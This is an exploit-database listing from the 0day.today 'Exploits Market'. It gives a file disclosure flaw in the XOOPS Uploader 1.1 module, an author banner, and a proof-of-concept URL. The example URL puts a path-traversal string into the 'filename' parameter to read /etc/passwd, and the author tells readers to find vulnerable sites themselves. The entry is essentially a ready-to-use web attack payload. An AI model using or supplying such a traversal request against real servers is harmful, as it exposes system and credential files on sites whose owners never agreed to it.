[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability

Author
MEEKAAH
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3129
Category
web applications
Date add
07-06-2008
Platform
unsorted
==================================================================
XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability
==================================================================



                                        MMM                                 MMM       
                                        MMM                                 MMM       
MMMMMMMMMMMMM    MMMMMMMMM  MMMMMMMMMM  MMMMMMMMM    MMMMMMMMM   MMMMMMMMM  MMMMMMMMM 
MM   MMM   MMM   MM         MMM         MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM MMMMM   MMMMMMMMMM  MMMMMMMMMM  MMM    MMM
MM   MMM   MMM   MM         MMM         MMM  MMMN   MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMMMM  MMMMMMMMMM  MMM   NMM   MMM    MMM  MMM    MMM  MMM    MMM


[*] Vulnerable : XOOPS Module Uploader 1.1 - Local File Inclusion

[*] Author     :  MEEKAAH

[*] Dork       :  Find it yourself ;)

[*] POC        :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=[LFI]

[*] Example    :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd

-----------------------------------------------------------------------------------------------------------




#  0day.today [2024-12-24]  #